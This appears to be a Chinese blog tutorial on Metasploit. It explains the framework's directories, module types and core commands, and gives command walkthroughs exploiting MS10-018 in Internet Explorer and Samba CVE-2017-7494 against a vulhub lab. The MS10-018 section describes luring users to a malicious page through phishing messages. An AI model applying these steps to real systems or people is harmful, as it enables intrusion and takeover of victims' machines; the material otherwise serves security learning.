ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

msfconsole

2026/9/4 8:08:45 拓冰建站 浏览量
msfconsole 全称Metasploit FrameworkMetasploit 渗透测试框架以下略称为msf内容文件内容Linux目录/usr/share/metasploit-framework/文件下有modules/这里是 MSF 的“弹药库”所有模块按功能和类型分门别类存放与msfconsole中的use命令路径一一对应。data/ 存放模块运行时所需的文件如弱口令字典、二进制可执行文件如mimikatz、各种模板文件等。scripts/ 存放 Meterpreter 的扩展脚本你可以在获得 Meterpreter 会话后用 run 命令执行它们以自动化一些后渗透任务。tools/ 存放一些独立于主框架之外的安全测试小工具比如msfvenom载荷生成器的调用脚本。子目录modules/文件目录下的子目录子目录对应模块类型主要作用auxiliary/辅助模块执行扫描、指纹识别、暴力破解等“前期的”信息收集任务通常不会建立控制会话。encoders/编码器模块对攻击载荷进行编码或混淆用于绕过杀毒软件免杀处理。exploits/漏洞利用模块核心攻击组件包含针对特定漏洞的攻击代码。nops/空指令生成器生成用于“填充”攻击载荷的无操作指令常用来提高漏洞利用的稳定性。payloads/攻击载荷模块包含漏洞触发后要在目标系统上执行的代码例如建立反向 Shell 的代码。post/后渗透模块在获取目标控制权后使用用于提权、信息收集、横向移动等高级操作。evasion/规避模块“免杀”和“绕过防御”指令核心命令功能描述示例?帮助命令msf6 ? searchsearch keyword搜索漏洞或攻击模块msf6 search ms08-067use path加载指定的攻击/辅助模块msf6 use exploit/windows/smb/ms08_067_netapishow options查看当前模块的配置参数msf6 exploit(...) show optionsset OPT VAL设置模块运行参数如目标IPmsf6 set RHOSTS 192.168.1.100run/exploit执行当前配置好的模块msf6 exploit(...) runsessions列出所有已获取的活跃会话msf6 back返回上一级之后查看未结束的攻击msf6 sessionssessions -i ID与指定ID的会话进行交互msf6 sessions -i 1exit退出MSF控制台或当前会话msf6 exit实操Windows xp系统MS10-018RCE漏洞构造一个恶意网页并通过钓鱼邮件或即时消息等方式诱导用户访问。当用户用存在漏洞的 IE 浏览器打开该页面时攻击者就能在用户电脑上悄悄执行恶意代码。nmap target网段根据获取到的目标信息确定有MS10-018漏洞进入msf msfconsole查询漏洞组件 search ms10-018使用0号工具 use 0如果不记得了就show options设置options set srvhost target 在目标机器上主动开启一个监听端口 set PAYLOAD windows/meterpreter/bind_tcp 设置命令交互端口 set lpost 4443 运行 runkali会返回一个url网站用靶机访问此网站在kali机上显示successfullyLinux Ubuntu系统CVE-2017-7494(Linux版永恒之蓝)在Ubuntu上搭建靶机环境进入环境目录 cd /home/enjoy/vulhub-master/samba/CVE-2017-7494 启动容器 docker-compose up -d#kali执行 msfconsole use exploit/linux/samba/is_known_pipename set RHOSTS 192.168.244.6 (wubangtuip) run id通过网盘分享的文件02Metasploit漏洞利用.pdf链接: https://pan.baidu.com/s/1cYa0DaEWKxg5e5nlFPz4EA?pwdrxar 提取码: rxar